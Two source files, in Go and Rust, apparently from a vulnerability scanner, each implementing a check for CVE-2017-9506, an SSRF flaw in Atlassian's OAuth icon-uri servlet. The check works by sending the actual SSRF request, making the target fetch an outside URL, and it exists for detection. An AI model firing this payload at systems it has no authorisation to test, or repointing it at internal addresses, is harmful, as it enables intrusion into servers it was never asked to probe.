File: go/scanner/module/http/atlassian/cve_2017_9506.go
package atlassian

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"

	"github.com/bloom42/phaser/common/phaser"
	"github.com/bloom42/phaser/common/phaser/findings"
	"github.com/bloom42/phaser/scanner/module"
)

type CVE_2017_9506 struct{}

func (CVE_2017_9506) Name() string {
	return "http/atlassian/cve_2017_9506"
}

func (CVE_2017_9506) Description() string {
	return "Check for CVE-2017-9506 (SSRF)"
}

func (CVE_2017_9506) Author() string {
	return "Sylvain Kerkour <sylvain@kerkour.com>"
}

func (CVE_2017_9506) Version() string {
	return "0.1.0"
}

func (CVE_2017_9506) Run(scan *phaser.Scan, target *phaser.Target, port phaser.Port) (module.Result, []error) {
	errs := []error{}
	var ret module.Result
	protocol := "http"

	if !port.HTTP && !port.HTTPS {
		return ret, errs
	}
	if port.HTTPS {
		protocol = "https"
	}

	URL := fmt.Sprintf("%s://%s:%d/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com/robots.txt", protocol, target.Host, port.ID)
	req, err := http.NewRequest("GET", URL, nil)
	if err != nil {
		errs = append(errs, err)
		return ret, errs
	}
	req.Header.Set("User-Agent", scan.Profile.HTTP.UserAgent)
	res, err := scan.HTTPClient.Do(req)
	if err != nil {
		errs = append(errs, err)
		return ret, errs
	}
	// request, _ := httputil.DumpRequestOut(req, true)
	// response, _ := httputil.DumpResponse(res, true)
	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		errs = append(errs, err)
		return ret, errs
	}
	res.Body.Close()
	bodyStrLower := strings.ToLower(string(body))

	if strings.Contains(bodyStrLower, "user-agent: *") &&
		strings.Contains(bodyStrLower, "disallow") {
		ret = findings.URL{URL: URL}
	}

	return ret, errs
}

File: src/scanner/modules/http/atlassian/cve_2017_9506.rs
use crate::{
    scanner::{
        module,
        findings,
        Scan,
        Target,
    },
    error::PhaserError,
};

pub struct Cve2017_9506{}

impl module::BaseModule for Cve2017_9506 {
    fn name(&self) -> String {
        return "http/atlassian/cve-2017-9506".to_string();
    }

    fn description(&self) -> String {
        return "Check for CVE-2017-9506 (SSRF)".to_string();
    }

    fn author(&self) -> String {
        return "Sylvain Kerkour <sylvain@kerkour.com>".to_string();
    }

    fn version(&self) -> String {
        return "0.1.0".to_string();
    }
}

// TODO: error handling not found
impl module::PortModule for Cve2017_9506 {
    fn run(&self, _: &Scan, target: &Target, port: &findings::Port) -> Result<findings::Data, PhaserError> {
        let protocol = if port.http {
            "http"
        } else if port.https {
            "https"
        } else {
            ""
        };

        if protocol.is_empty() {
            return Ok(findings::Data::None);
        }

        let url = format!("{}://{}:{}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com/robots.txt", &protocol, &target.host, &port.id);
        let body = reqwest::get(&url)?
            .text()?;

        if body.contains("user-agent: *") && body.contains("disallow") {
            return Ok(findings::Data::Url(findings::Url{
                url,
            }));
        }

        return Ok(findings::Data::None);
    }
}


#[cfg(test)]
mod tests {
    use crate::scanner::module::BaseModule;

    #[test]
    fn module_name() {
        let module = super::Cve2017_9506{};
        assert_eq!("http/atlassian/cve-2017-9506", module.name());
    }
}
